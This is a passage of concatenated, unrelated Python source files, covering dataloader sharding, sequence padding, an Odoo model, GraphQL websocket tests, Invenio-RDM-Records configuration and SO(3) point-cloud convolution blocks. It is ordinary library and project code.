multiplied by :obj:`num_processes` otherwise. Setting this option to :obj:`True` requires that the batch size of the :obj:`dataloader` is a round multiple of :obj:`batch_size`. put_on_device (:obj:`bool`, `optional`, defaults to :obj:`False`): Whether or not to put the batches on :obj:`device` (only works if the batches are nested list, tuples or dictionaries of tensors). Returns: :obj:`torch.utils.data.dataloader.DataLoader`: A new data loader that will yield the portion of the batches .. warning:: This does not support :obj:`BatchSampler` with varying batch size yet. """ # Grab defaults from AcceleratorState state = AcceleratorState() if num_processes is None: num_processes = state.num_processes if process_index is None: process_index = state.process_index # Sanity check if split_batches and dataloader.batch_size % num_processes != 0: raise ValueError( f"Using `split_batches=True` requires that the batch size ({dataloader.batch_size}) " f"to be a round multiple of the number of processes ({num_processes})." ) new_dataset = dataloader.dataset new_batch_sampler = dataloader.batch_sampler # No change if no multiprocess if num_processes != 1: if isinstance(new_dataset, IterableDataset): new_dataset = IterableDatasetShard( new_dataset, batch_size=dataloader.batch_size, drop_last=dataloader.drop_last, num_processes=num_processes, process_index=process_index, split_batches=split_batches, ) else: # New batch sampler for the current process. new_batch_sampler = BatchSamplerShard( dataloader.batch_sampler, num_processes=num_processes, process_index=process_index, split_batches=split_batches, ) # We ignore all of those since they are all dealt with by our new_batch_sampler ignore_kwargs = [ "batch_size", "shuffle", "sampler", "batch_sampler", "drop_last", ] kwargs = { k: getattr(dataloader, k, _PYTORCH_DATALOADER_KWARGS[k]) for k in _PYTORCH_DATALOADER_KWARGS if k not in ignore_kwargs } return DataLoaderShard( new_dataset, device=device if put_on_device else None, batch_sampler=new_batch_sampler, **kwargs, )
# coding: utf-8 # 2021/7/12 @ tongshiwei __all__ = ["PadSequence", "pad_sequence"] class PadSequence(object): """Pad the sequence. Pad the sequence to the given `length` by inserting `pad_val`. If `clip` is set, sequence that has length larger than `length` will be clipped. Parameters ---------- length : int The maximum length to pad/clip the sequence pad_val : number The pad value. Default 0 clip : bool """ def __init__(self, length, pad_val=0, clip=True): self._length = length self._pad_val = pad_val self._clip = clip def __call__(self, sample: list): """ Parameters ---------- sample : list of number Returns ------- ret : list of number """ sample_length = len(sample) if sample_length >= self._length: if self._clip and sample_length > self._length: return sample[:self._length] else: return sample else: return sample + [ self._pad_val for _ in range(self._length - sample_length) ] def pad_sequence(sequence: list, max_length=None, pad_val=0, clip=True): """ Parameters ---------- sequence max_length pad_val clip Returns ------- Examples -------- >>> seq = [[4, 3, 3], [2], [3, 3, 2]] >>> pad_sequence(seq) [[4, 3, 3], [2, 0, 0], [3, 3, 2]] >>> pad_sequence(seq, pad_val=1) [[4, 3, 3], [2, 1, 1], [3, 3, 2]] >>> pad_sequence(seq, max_length=2) [[4, 3], [2, 0], [3, 3]] >>> pad_sequence(seq, max_length=2, clip=False) [[4, 3, 3], [2, 0], [3, 3, 2]] """ padder = PadSequence(max([len(seq) for seq in sequence]) if max_length is None else max_length, pad_val, clip) return [padder(seq) for seq in sequence]
# -*- coding: utf-8 -*- from odoo import models, fields, api, _ class AmazonProduct(models.Model): _name = "amazon.product" name = fields.Char('Product Name') img_url = fields.Char(string="Image URL") link_url = fields.Char(string="Link URL")
""" Abstracts a column to handle its existence as both part of a Table and a namespace variable. A ColumnVariable has a lifetime no longer than the period that the underlying column is static. """ import api_util import cell_types class ColumnVariable(object): """ Manages the relationship between the data in a Column and a namespace variable with the same name. This is done in the context of formula evaluation, especially iterative evaluation of formulas. The ColumnVariable assumes that the underlying table is not updated. If the underlying table is to be updated: 1. use setColumnValue() to update the column from the namespace variable 2. Make the table modifications 3. Create a new ColumnVariable. """ def __init__(self, column): """ :param Column column: """ self._column = column self._baseline_value = self.getColumnValue() self._setNamespaceValue() self._iteration_start_value = self.getNamespaceValue() def getNamespaceValue(self): # TODO: This won't work with nested columns - consider namespaces root = self._column.getRoot(is_attached=False) return root.getNamespace()[self._column.getName(is_global_name=False)] def getColumn(self): return self._column def getName(self): return self._column.getName(is_global_name=False) def getColumnValue(self): return self._column.getCells() # TODO: All names have global scope. Provide hierarchical scopes. def _setNamespaceValue(self): """ Establishes the value of the variable in the namespace. """ table = self._column.getRoot(is_attached=False) # TODO: This won't work with nested columns - consider namespaces table.getNamespace()[self._column.getName(is_global_name=False)] = \ api_util.coerceValuesForColumn(self._column, self.getColumnValue()) def setColumnValue(self): """ Establishes the value of the variable in the Column. Called if the column is changed outside the namespace during formula evaluation. :param object value: """ self._column.addCells(self.getNamespaceValue(), replace=True) def setIterationStartValue(self): """ Establishes the value of the variable in the namespace at the start of an iteration in formula evaluation. """ self._iteration_start_value = self.getNamespaceValue() def isNamespaceValueEquivalentToBaselineValue(self): """ Checks if the value of the variable in the namespace has changed from its baselineline value. :return bool: True if changed """ return cell_types.isEquivalentData(self.getNamespaceValue(), self._baseline_value) def isNamespaceValueEquivalentToIterationStartValue(self): """ Checks if the value of the variable in the namespace has changed from its iteration start value :return bool: True if changed """ return cell_types.isEquivalentData(self.getNamespaceValue(), self._iteration_start_value)
import FWCore.ParameterSet.Config as cms badGlobalMuonTaggerMAOD = cms.EDFilter("BadGlobalMuonTagger", muons = cms.InputTag("slimmedMuons"), vtx = cms.InputTag("offlineSlimmedPrimaryVertices"), muonPtCut = cms.double(20), selectClones = cms.bool(False), taggingMode = cms.bool(False), ) cloneGlobalMuonTaggerMAOD = badGlobalMuonTaggerMAOD.clone( selectClones = True ) noBadGlobalMuonsMAOD = cms.Sequence(~cloneGlobalMuonTaggerMAOD + ~badGlobalMuonTaggerMAOD)
from strawberry.subscriptions import GRAPHQL_TRANSPORT_WS_PROTOCOL, GRAPHQL_WS_PROTOCOL from .app import create_app async def test_graphiql_view(aiohttp_app_client): response = await aiohttp_app_client.get("/graphql", headers={"Accept": "text/html"}) body = await response.text() assert "GraphiQL" in body async def test_graphiql_disabled_view(aiohttp_client): app = create_app(graphiql=False) client = await aiohttp_client(app) response = await client.get("/graphql", headers={"Accept": "text/html"}) assert response.status == 404 async def test_turning_off_graphql_ws(aiohttp_client): app = create_app(subscription_protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL]) aiohttp_app_client = await aiohttp_client(app) async with aiohttp_app_client.ws_connect( "/graphql", protocols=[GRAPHQL_WS_PROTOCOL] ) as ws: data = await ws.receive(timeout=2) assert ws.protocol is None assert ws.closed assert ws.close_code == 4406 assert data.extra == "Subprotocol not acceptable" async def test_turning_off_graphql_transport_ws(aiohttp_client): app = create_app(subscription_protocols=[GRAPHQL_WS_PROTOCOL]) aiohttp_app_client = await aiohttp_client(app) async with aiohttp_app_client.ws_connect( "/graphql", protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL] ) as ws: data = await ws.receive(timeout=2) assert ws.protocol is None assert ws.closed assert ws.close_code == 4406 assert data.extra == "Subprotocol not acceptable" async def test_turning_off_all_ws_protocols(aiohttp_client): app = create_app(subscription_protocols=[]) aiohttp_app_client = await aiohttp_client(app) async with aiohttp_app_client.ws_connect( "/graphql", protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL] ) as ws: data = await ws.receive(timeout=2) assert ws.protocol is None assert ws.closed assert ws.close_code == 4406 assert data.extra == "Subprotocol not acceptable" async with aiohttp_app_client.ws_connect( "/graphql", protocols=[GRAPHQL_WS_PROTOCOL] ) as ws: data = await ws.receive(timeout=2) assert ws.protocol is None assert ws.closed assert ws.close_code == 4406 assert data.extra == "Subprotocol not acceptable" async def test_unsupported_ws_protocol(aiohttp_client): app = create_app(subscription_protocols=[]) aiohttp_app_client = await aiohttp_client(app) async with aiohttp_app_client.ws_connect( "/graphql", protocols=["imaginary-protocol"] ) as ws: data = await ws.receive(timeout=2) assert ws.protocol is None assert ws.closed assert ws.close_code == 4406 assert data.extra == "Subprotocol not acceptable" async def test_clients_can_prefer_protocols(aiohttp_client): app = create_app( subscription_protocols=[GRAPHQL_WS_PROTOCOL, GRAPHQL_TRANSPORT_WS_PROTOCOL] ) aiohttp_app_client = await aiohttp_client(app) async with aiohttp_app_client.ws_connect( "/graphql", protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL, GRAPHQL_WS_PROTOCOL] ) as ws: assert ws.protocol == GRAPHQL_TRANSPORT_WS_PROTOCOL async with aiohttp_app_client.ws_connect( "/graphql", protocols=[GRAPHQL_WS_PROTOCOL, GRAPHQL_TRANSPORT_WS_PROTOCOL] ) as ws: assert ws.protocol == GRAPHQL_WS_PROTOCOL
""" Standard logger settings """ import logging LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s" def get_logger(name, level=logging.DEBUG): logger = logging.getLogger(name) logger.setLevel(level) # create console handler and set level to debug console_handler = logging.StreamHandler() console_handler.setLevel(level) formatter = logging.Formatter(LOG_FORMAT) console_handler.setFormatter(formatter) logger.addHandler(console_handler) return logger
# -*- coding: utf-8 -*- import calendar from jinja2 import Environment, PackageLoader class Mbrmau: def __init__(self, year, month): first_weekday, last_day = calendar.monthrange(year, month) days = map(lambda n: n+1, range(last_day)) weekdays = map(lambda n: (first_weekday+n) % 7, range(last_day)) workdays = filter(lambda n: n[1] < 5, zip(days, weekdays)) self.__workdays =\ list(map(lambda n: '%d/%d/%d' % (year, month, n[0]), workdays)) def message(self): pl = PackageLoader('mbrmau', './', encoding='utf8') env = Environment(loader=pl) tpl = env.get_template('message.tpl') tpl_variables = { "days": self.__workdays } message = tpl.render(tpl_variables) return message if __name__ == '__main__': print(Mbrmau(2016, 12).message())
# -*- coding: utf-8 -*- # # Copyright (C) 2019 CERN. # Copyright (C) 2019 Northwestern University. # Copyright (C) 2021 Graz University of Technology. # # Invenio-RDM-Records is free software; you can redistribute it and/or modify # it under the terms of the MIT License; see LICENSE file for more details. """DataCite-based data model for Invenio.""" import idutils from .services import facets def _(x): """Identity function for string extraction.""" return x # Files REST # FILES_REST_PERMISSION_FACTORY = record_files_permission_factory """Set default files permission factory.""" # Invenio-RDM-Records # =================== RDM_RECORDS_METADATA_NAMESPACES = {} """Namespaces for fields *added* to the metadata schema. Of the shape: .. code-block:: python { '<prefix1>': { '@context': '<url>' }, # ... '<prefixN>': { '@context': '<url>' } } For example: .. code-block:: python { 'dwc': { '@context': 'http://rs.tdwg.org/dwc/terms/' }, 'z':{ '@context': 'https://zenodo.org/terms' } } Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_EXTENSIONS` to define the added fields. See :class:`invenio_rdm_records.services.schemas.\ metadata_extensions.MetadataExtensions` for how this configuration variable is used. """ RDM_RECORDS_METADATA_EXTENSIONS = {} """Fields added to the metadata schema. Of the shape: .. code-block:: python { '<prefix1>:<field1>': { 'elasticsearch': '<allowed elasticsearch type>' 'marshmallow': '<allowed marshmallow type>' }, # ... '<prefixN>:<fieldN>': { 'elasticsearch': '<allowed elasticsearch type>' 'marshmallow': '<allowed marshmallow type>' } } For example: .. code-block:: python { 'dwc:family': { 'elasticsearch': 'keyword', 'marshmallow': SanitizedUnicode() }, 'dwc:behavior': { 'elasticsearch': 'text', 'marshmallow': SanitizedUnicode() }, 'z:department': { 'elasticsearch': 'text', 'marshmallow': SanitizedUnicode() } } Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_NAMESPACES` to define the prefixes. See :class:`invenio_rdm_records.services.schemas.\ metadata_extensions.MetadataExtensions` for allowed types and how this configuration variable is used. """ RDM_RECORDS_USER_FIXTURE_PASSWORDS = { "admin@inveniosoftware.org": None } """Overrides for the user fixtures' passwords. The password set for a user fixture in this dictionary overrides the password set in the ``users.yaml`` file. This can be used to set custom passwords for the fixture users (of course, this has to be configured before the fixtures are installed, e.g. by setting up the services). If ``None`` or an empty string is configured in this dictionary, then the password from ``users.yaml`` will be used. If that is also absent, a password will be generated randomly. """ RDM_RECORDS_UI_EDIT_URL = "/uploads/<pid_value>" """Default UI URL for the edit page of a Bibliographic Record.""" #: Default site URL (used only when not in a context - e.g. like celery tasks). THEME_SITEURL = "http://127.0.0.1:5000" #: DataCite DOI credentials RDM_RECORDS_DOI_DATACITE_ENABLED = True RDM_RECORDS_DOI_DATACITE_USERNAME = "" RDM_RECORDS_DOI_DATACITE_PASSWORD = "" RDM_RECORDS_DOI_DATACITE_PREFIX = "10.1234" RDM_RECORDS_DOI_DATACITE_TEST_MODE = True RDM_RECORDS_DOI_DATACITE_FORMAT = "{prefix}/{id}" # PID Schemes def always_valid(identifier): """Gives every identifier as valid.""" return True RDM_RECORDS_RECORD_PID_SCHEMES = { "doi": { "label": _("DOI"), "validator": idutils.is_doi }, "oai": { "label": _("OAI"), "validator": always_valid } } RDM_RECORDS_PERSONORG_SCHEMES = { "orcid": { "label": _("ORCID"), "validator": idutils.is_orcid, "datacite": "ORCID" }, "isni": { "label": _("ISNI"), "validator": idutils.is_isni, "datacite": "ISNI" }, "gnd": { "label": _("GND"), "validator": idutils.is_gnd, "datacite": "GND" }, "ror": { "label": _("ROR"), "validator": idutils.is_ror, "datacite": "ROR" }, } RDM_RECORDS_IDENTIFIERS_SCHEMES = { "ark": { "label": _("ARK"), "validator": idutils.is_ark, "datacite": "ARK" }, "arxiv": { "label": _("arXiv"), "validator": idutils.is_arxiv, "datacite": "arXiv" }, "bibcode": { "label": _("Bibcode"), "validator": idutils.is_ads, "datacite": "bibcode" }, "doi": { "label": _("DOI"), "validator": idutils.is_doi, "datacite": "DOI" }, "ean13": { "label": _("EAN13"), "validator": idutils.is_ean13, "datacite": "EAN13" }, "eissn": { "label": _("EISSN"), "validator": idutils.is_issn, "datacite": "EISSN" }, "handle": { "label": _("Handle"), "validator": idutils.is_handle, "datacite": "Handle" }, "igsn": { "label": _("IGSN"), "validator": always_valid, "datacite": "IGSN" }, "isbn": { "label": _("ISBN"), "validator": idutils.is_isbn, "datacite": "ISBN" }, "issn": { "label": _("ISSN"), "validator": idutils.is_issn, "datacite": "ISSN" }, "istc": { "label": _("ISTC"), "validator": idutils.is_istc, "datacite": "ISTC" }, "lissn": { "label": _("LISSN"), "validator": idutils.is_issn, "datacite": "LISSN" }, "lsid": { "label": _("LSID"), "validator": idutils.is_lsid, "datacite": "LSID" }, "pmid": { "label": _("PMID"), "validator": idutils.is_pmid, "datacite": "PMID" }, "purl": { "label": _("PURL"), "validator": idutils.is_purl, "datacite": "PURL" }, "upc": { "label": _("UPC"), "validator": always_valid, "datacite": "UPC" }, "url": { "label": _("URL"), "validator": idutils.is_url, "datacite": "URL" }, "urn": { "label": _("URN"), "validator": idutils.is_urn, "datacite": "URN" }, "w3id": { "label": _("W3ID"), "validator": always_valid, "datacite": "w3id" }, } """These are used for main, alternate and related identifiers.""" RDM_RECORDS_REFERENCES_SCHEMES = { "isni": { "label": _("ISNI"), "validator": idutils.is_isni }, "grid": { "label": _("GRID"), "validator": always_valid }, "crossreffunderid": { "label": _("Crossref Funder ID"), "validator": always_valid }, "other": { "label": _("Other"), "validator": always_valid } } RDM_RECORDS_LOCATION_SCHEMES = { "wikidata": { "label": _("Wikidata"), "validator": always_valid }, "geonames": { "label": _("GeoNames"), "validator": always_valid } } # # Record permission policy # RDM_PERMISSION_POLICY = None """Override the default record permission policy.""" # # Search configuration # RDM_FACETS = { 'access_status': { 'facet': facets.access_status, 'ui': { 'field': 'access.status', } }, 'is_published': { 'facet': facets.is_published, 'ui': { 'field': 'is_published', } }, 'language': { 'facet': facets.language, 'ui': { 'field': 'languages', } }, 'resource_type': { 'facet': facets.resource_type, 'ui': { 'field': 'resource_type.type', 'childAgg': { 'field': 'resource_type.subtype', } } }, 'subject': { 'facet': facets.subject, 'ui': { 'field': 'subjects.subject', } }, 'subject_nested': { 'facet': facets.subject_nested, 'ui': { 'field': 'subjects.scheme', 'childAgg': { 'field': 'subjects.subject', } } }, } RDM_SORT_OPTIONS = { "bestmatch": dict( title=_('Best match'), fields=['_score'], # ES defaults to desc on `_score` field ), "newest": dict( title=_('Newest'), fields=['-created'], ), "oldest": dict( title=_('Oldest'), fields=['created'], ), "version": dict( title=_('Version'), fields=['-versions.index'], ), "updated-desc": dict( title=_('Recently updated'), fields=['-updated'], ), "updated-asc": dict( title=_('Least recently updated'), fields=['updated'], ), } """Definitions of available record sort options. .. code-block: "<option name>": dict( title=_('<title>'), fields=['-updated'], ), """ RDM_SEARCH = { 'facets': ['access_status', 'resource_type'], 'sort': ['bestmatch', 'newest', 'oldest', 'version'] } """Record search configuration. The configuration has two possible keys: - ``facets`` - A list of facet names which must have been defined in ``RDM_FACETS``. - ``sort`` - A list of sort option names which must have been defined in ``RDM_SORT_OPTIONS``. - ``sort_default`` - The default sort option when a query is provided. Must be a single sort option name which must have been defined in ``RDM_SORT_OPTIONS``. If not provided, will use the first element of the ``sort`` list. - ``sort_default_no_query`` - The default sort option when no query is provided. Must be a single sort option name which must have been defined in ``RDM_SORT_OPTIONS``. If not provided, will use the second element of the ``sort`` list. """ RDM_SEARCH_DRAFTS = { 'facets': ['access_status', 'is_published', 'resource_type'], 'sort': ['bestmatch', 'updated-desc', 'updated-asc', 'newest', 'oldest', 'version'], } """User records search configuration (i.e. list of uploads).""" RDM_SEARCH_VERSIONING = { 'facets': [], 'sort': ['version'], 'sort_default': 'version', 'sort_default_no_query': 'version', } """Records versions search configuration (list of versions for a record)."""
import math import os import numpy as np import time from collections import namedtuple import scipy.io as sio import torch import torch.nn as nn import torch.nn.functional as F from torch.nn.modules.batchnorm import _BatchNorm # import vgtk.zpconv as zptk import vgtk.so3conv as sptk # SO3 Conv # [nb, np, 3] -> [nb, 3, np] x [nb, 1, np, na] def preprocess_input(x, na, add_center=True): has_normals = x.shape[2] == 6 # add a dummy center point at index zero if add_center and not has_normals: center = x.mean(1, keepdim=True) x = torch.cat((center,x),dim=1)[:,:-1] xyz = x[:,:,:3] return sptk.SphericalPointCloud(xyz.permute(0,2,1).contiguous(), sptk.get_occupancy_features(x, na, add_center), None) # [b, c1, p, a] -> [b, c1, k, p, a] -> [b, c2, p, a] class IntraSO3ConvBlock(nn.Module): def __init__(self, dim_in, dim_out, norm=None, activation='relu', dropout_rate=0): super(IntraSO3ConvBlock, self).__init__() if norm is None: norm = nn.InstanceNorm2d self.conv = sptk.IntraSO3Conv(dim_in, dim_out) self.norm = norm(dim_out, affine=False) if activation is None: self.relu = None else: self.relu = getattr(F, activation) self.dropout = nn.Dropout(dropout_rate) if dropout_rate > 0 else None def forward(self, x): # [b, 3, p] x [b, c1, p] x = self.conv(x) feat = self.norm(x.feats) if self.relu is not None: feat = self.relu(feat) if self.training and self.dropout is not None: feat = self.dropout(feat) # [b, 3, p] x [b, c2, p] return sptk.SphericalPointCloud(x.xyz, feat, x.anchors) class PropagationBlock(nn.Module): def __init__(self, params, norm=None, activation='relu', dropout_rate=0): super(PropagationBlock, self).__init__() self.prop = sptk.KernelPropagation(**params) if norm is None: norm = nn.InstanceNorm2d #nn.BatchNorm2d if activation is None: self.relu = None else: self.relu = getattr(F, activation) self.norm = norm(params['dim_out'], affine=False) self.dropout = nn.Dropout(dropout_rate) if dropout_rate > 0 else None def forward(self, frag, clouds): x = self.prop(frag, clouds) feat = self.norm(x.feats) if self.relu is not None: feat = self.relu(feat) if self.training and self.dropout is not None: feat = self.dropout(feat) return sptk.SphericalPointCloud(x.xyz, feat, x.anchors) # [b, c1, p1, a] -> [b, c1, k, p2, a] -> [b, c2, p2, a] class InterSO3ConvBlock(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, stride, radius, sigma, n_neighbor, multiplier, kanchor=60, lazy_sample=None, norm=None, activation='relu', pooling='none', dropout_rate=0): super(InterSO3ConvBlock, self).__init__() if lazy_sample is None: lazy_sample = True if norm is None: norm = nn.InstanceNorm2d #nn.BatchNorm2d pooling_method = None if pooling == 'none' else pooling self.conv = sptk.InterSO3Conv(dim_in, dim_out, kernel_size, stride, radius, sigma, n_neighbor, kanchor=kanchor, lazy_sample=lazy_sample, pooling=pooling_method) self.norm = norm(dim_out, affine=False) if activation is None: self.relu = None else: self.relu = getattr(F, activation) self.dropout = nn.Dropout(dropout_rate) if dropout_rate > 0 else None def forward(self, x, inter_idx=None, inter_w=None): inter_idx, inter_w, sample_idx, x = self.conv(x, inter_idx, inter_w) # import ipdb; ipdb.set_trace() feat = self.norm(x.feats) if self.relu is not None: feat = self.relu(feat) ## TODO no need to add self.training if self.training and self.dropout is not None: feat = self.dropout(feat) return inter_idx, inter_w, sample_idx, sptk.SphericalPointCloud(x.xyz, feat, x.anchors) class BasicSO3ConvBlock(nn.Module): def __init__(self, params): super(BasicSO3ConvBlock, self).__init__() self.blocks = nn.ModuleList() self.layer_types = [] for param in params: if param['type'] == 'intra_block': conv = IntraSO3ConvBlock(**param['args']) elif param['type'] == 'inter_block': conv = InterSO3ConvBlock(**param['args']) elif param['type'] == 'separable_block': conv = SeparableSO3ConvBlock(param['args']) else: raise ValueError(f'No such type of SO3Conv {param["type"]}') self.layer_types.append(param['type']) self.blocks.append(conv) self.params = params def forward(self, x): inter_idx, inter_w = None, None for conv, param in zip(self.blocks, self.params): if param['type'] in ['inter', 'inter_block', 'separable_block']: inter_idx, inter_w, _, x = conv(x, inter_idx, inter_w) # import ipdb; ipdb.set_trace() if param['args']['stride'] > 1: inter_idx, inter_w = None, None elif param['type'] in ['intra_block']: # Intra Convolution x = conv(x) else: raise ValueError(f'No such type of SO3Conv {param["type"]}') return x def get_anchor(self): return torch.from_numpy(sptk.get_anchors()) class SeparableSO3ConvBlock(nn.Module): def __init__(self, params): super(SeparableSO3ConvBlock, self).__init__() dim_in = params['dim_in'] dim_out = params['dim_out'] self.use_intra = params['kanchor'] > 1 self.inter_conv = InterSO3ConvBlock(**params) intra_args = { 'dim_in': dim_out, 'dim_out': dim_out, 'dropout_rate': params['dropout_rate'], 'activation': params['activation'], } if self.use_intra: self.intra_conv = IntraSO3ConvBlock(**intra_args) self.stride = params['stride'] # 1x1 conv for skip connection self.skip_conv = nn.Conv2d(dim_in, dim_out, 1) self.norm = nn.InstanceNorm2d(dim_out, affine=False) self.relu = getattr(F, params['activation']) def forward(self, x, inter_idx, inter_w): ''' inter, intra conv with skip connection ''' skip_feature = x.feats inter_idx, inter_w, sample_idx, x = self.inter_conv(x, inter_idx, inter_w) if self.use_intra: x = self.intra_conv(x) if self.stride > 1: skip_feature = sptk.functional.batched_index_select(skip_feature, 2, sample_idx.long()) skip_feature = self.skip_conv(skip_feature) skip_feature = self.relu(self.norm(skip_feature)) x_out = sptk.SphericalPointCloud(x.xyz, x.feats + skip_feature, x.anchors) return inter_idx, inter_w, sample_idx, x_out def get_anchor(self): return torch.from_numpy(sptk.get_anchors()) class ClsOutBlockR(nn.Module): def __init__(self, params, norm=None): super(ClsOutBlockR, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] fc = params['fc'] k = params['k'] self.outDim = k self.linear = nn.ModuleList() self.norm = nn.ModuleList() # ------------------ uniary conv ---------------- for c in mlp: self.linear.append(nn.Conv2d(c_in, c, 1)) self.norm.append(nn.BatchNorm2d(c)) c_in = c # ----------------------------------------------- # ------------------ intra conv ----------------- if 'intra' in params.keys(): self.intra = nn.ModuleList() self.skipconv = nn.ModuleList() for intraparams in params['intra']: conv = IntraSO3ConvBlock(**intraparams['args']) self.intra.append(conv) c_out = intraparams['args']['dim_out'] # for skip convs self.skipconv.append(nn.Conv2d(c_in, c_out, 1)) self.norm.append(nn.BatchNorm2d(c_out)) c_in = c_out # ----------------------------------------------- # ----------------- pooling --------------------- if 'pooling' not in params.keys(): self.pooling_method = 'max' else: self.pooling_method = params['pooling'] # BxCxA -> Bx1xA or BxCxA attention weights if self.pooling_method == 'attention': self.temperature = params['temperature'] self.attention_layer = nn.Conv1d(c_in, 1, 1) elif self.pooling_method == 'attention2': self.temperature = params['temperature'] self.attention_layer = nn.Conv1d(c_in, c_in, 1) # ------------------------------------------------ self.fc1 = nn.ModuleList() for c in fc: self.fc1.append(nn.Linear(c_in, c)) # self.norm.append(nn.BatchNorm1d(c)) c_in = c self.fc2 = nn.Linear(c_in, self.outDim) def forward(self, feats, label=None): x_out = feats norm_cnt = 0 end = len(self.linear) for lid, linear in enumerate(self.linear): norm = self.norm[norm_cnt] x_out = linear(x_out) x_out = F.relu(norm(x_out)) norm_cnt += 1 # mean pool at xyz out_feat = x_out x_out = x_out.mean(2, keepdim=True) # group convolution after mean pool if hasattr(self, 'intra'): x_in = sptk.SphericalPointCloud(None, x_out, None) for lid, conv in enumerate(self.intra): skip_feat = x_in.feats x_in = conv(x_in) # skip connection norm = self.norm[norm_cnt] skip_feat = self.skipconv[lid](skip_feat) skip_feat = F.relu(norm(skip_feat)) x_in = sptk.SphericalPointCloud(None, skip_feat + x_in.feats, None) norm_cnt += 1 x_out = x_in.feats # mean pooling if self.pooling_method == 'mean': x_out = x_out.mean(dim=3).mean(dim=2) elif self.pooling_method == 'debug': # for debug only x_out = x_out[..., 0].mean(2) elif self.pooling_method == 'max': # max pooling x_out = x_out.mean(2).max(-1)[0] ############## DEBUG ONLY ###################### elif label is not None: def to_one_hot(label, num_class): ''' label: [B,...] return [B,...,num_class] ''' comp = torch.arange(num_class).long().to(label.device) for i in range(label.dim()): comp = comp.unsqueeze(0) onehot = label.unsqueeze(-1) == comp return onehot.float() x_out = x_out.mean(2) label = label.squeeze() if label.dim() == 2: cdim = x_out.shape[1] label = label.repeat(1,5)[:,:cdim] confidence = to_one_hot(label, x_out.shape[2]) if confidence.dim() < 3: confidence = confidence.unsqueeze(1) x_out = x_out * confidence x_out = x_out.sum(-1) #################################################### elif self.pooling_method.startswith('attention'): x_out = x_out.mean(2) out_feat = self.attention_layer(x_out) # Bx1XA or BxCxA confidence = F.softmax(out_feat * self.temperature, dim=2) x_out = x_out * confidence x_out = x_out.sum(-1) else: raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!") # fc layers for linear in self.fc1: x_out = linear(x_out) x_out = F.relu(x_out) x_out = self.fc2(x_out) return x_out, out_feat.squeeze() class ClsOutBlockPointnet(nn.Module): def __init__(self, params, norm=None): super(ClsOutBlockPointnet, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] fc = params['fc'] k = params['k'] na = params['kanchor'] self.outDim = k self.linear = nn.ModuleList() self.norm = nn.ModuleList() # ------------------ uniary conv ---------------- for c in mlp: self.linear.append(nn.Conv2d(c_in, c, 1)) self.norm.append(nn.BatchNorm2d(c)) c_in = c # ----------------------------------------------- # ----------------- pooling --------------------- if 'pooling' not in params.keys(): self.pooling_method = 'max' else: self.pooling_method = params['pooling'] # BxCxA -> Bx1xA or BxCxA attention weights if self.pooling_method == 'attention': self.temperature = params['temperature'] self.attention_layer = nn.Conv1d(c_in, 1, 1) # ------------------------------------------------ self.pointnet = sptk.PointnetSO3Conv(c_in, c_in, na) self.norm.append(nn.BatchNorm1d(c_in)) self.fc2 = nn.Linear(c_in, self.outDim) def forward(self, x, label=None): x_out = x.feats norm_cnt = 0 end = len(self.linear) for lid, linear in enumerate(self.linear): norm = self.norm[norm_cnt] x_out = linear(x_out) x_out = F.relu(norm(x_out)) norm_cnt += 1 out_feat = x_out x_in = sptk.SphericalPointCloud(x.xyz, out_feat, x.anchors) x_out = self.pointnet(x_in) norm = self.norm[norm_cnt] norm_cnt += 1 x_out = F.relu(norm(x_out)) # mean pooling if self.pooling_method == 'mean': x_out = x_out.mean(dim=2) elif self.pooling_method == 'debug': # for debug only x_out = x_out[..., 0].mean(2) elif self.pooling_method == 'max': # max pooling x_out = x_out.max(2)[0] elif self.pooling_method.startswith('attention'): out_feat = self.attention_layer(x_out) # Bx1XA or BxCxA confidence = F.softmax(out_feat * self.temperature, dim=2) x_out = x_out * confidence x_out = x_out.sum(-1) else: raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!") x_out = self.fc2(x_out) return x_out, out_feat.squeeze() class InvOutBlockR(nn.Module): def __init__(self, params, norm=None): super(InvOutBlockR, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] if 'pooling' not in params.keys(): self.pooling_method = 'max' else: self.pooling_method = params['pooling'] self.norm = nn.ModuleList() # Attention layer if self.pooling_method == 'attention': self.temperature = params['temperature'] self.attention_layer = nn.Conv1d(mlp[-1], 1, 1) # 1x1 Conv layer self.linear = nn.ModuleList() for c in mlp: self.linear.append(nn.Conv2d(c_in, c, 1)) self.norm.append(nn.InstanceNorm2d(c, affine=False)) c_in = c def forward(self, feats): x_out = feats end = len(self.linear) for lid, linear in enumerate(self.linear): x_out = linear(x_out) if lid != end - 1: norm = self.norm[lid] x_out = F.relu(norm(x_out)) out_feat = x_out.mean(2) # mean pooling if self.pooling_method == 'mean': x_out = x_out.mean(dim=3).mean(dim=2) elif self.pooling_method == 'debug': # for debug only x_out = x_out[..., 0].mean(2) elif self.pooling_method == 'max': # max pooling x_out = x_out.mean(2).max(-1)[0] elif self.pooling_method == 'attention': x_out = x_out.mean(2) out_feat = self.attention_layer(x_out) confidence = F.softmax(out_feat * self.temperature, dim=2) x_out = x_out * confidence x_out = x_out.sum(-1) out_feat = confidence.squeeze() else: raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!") return F.normalize(x_out, p=2, dim=1), out_feat class InvOutBlockPointnet(nn.Module): def __init__(self, params, norm=None): super(InvOutBlockPointnet, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] c_out = mlp[-1] na = params['kanchor'] if 'pooling' not in params.keys(): self.pooling_method = 'max' else: self.pooling_method = params['pooling'] self.pointnet = sptk.PointnetSO3Conv(c_in,c_out,na) # Attention layer if self.pooling_method == 'attention': self.temperature = params['temperature'] self.attention_layer = nn.Conv1d(c_out, 1, 1) def forward(self, x): # nb, nc, np, na -> nb, nc, na x_out = self.pointnet(x) out_feat = x_out # mean pooling if self.pooling_method == 'mean': x_out = x_out.mean(dim=2) elif self.pooling_method == 'max': # max pooling x_out = x_out.max(2)[0] elif self.pooling_method == 'attention': attw = self.attention_layer(x_out) 